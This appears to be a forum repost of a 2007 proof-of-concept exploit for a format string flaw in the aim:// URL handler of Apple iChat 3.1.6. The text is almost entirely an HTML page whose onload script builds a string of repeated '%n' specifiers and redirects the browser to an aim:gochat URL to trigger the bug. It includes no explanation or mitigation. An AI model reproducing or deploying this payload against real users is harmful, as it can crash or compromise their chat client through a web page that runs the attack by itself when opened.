Apple iChat 3.1.6 v441 aim:// URL Handler Format String Exploit PoC
[code]<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN""http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>MOAB-20-01-2007</title>
<script>
function boom() {
var str = '';
for (var i = 0; i < 20; i++) {
str = str + escape('A%n');
}
str = 'aim:gochat?roomname=' + str;
window.location = str;
}
</script>
</head>
<body onload="boom()">
</body>
</html>
# syue.com [2007-01-21][/code]
页:
[1]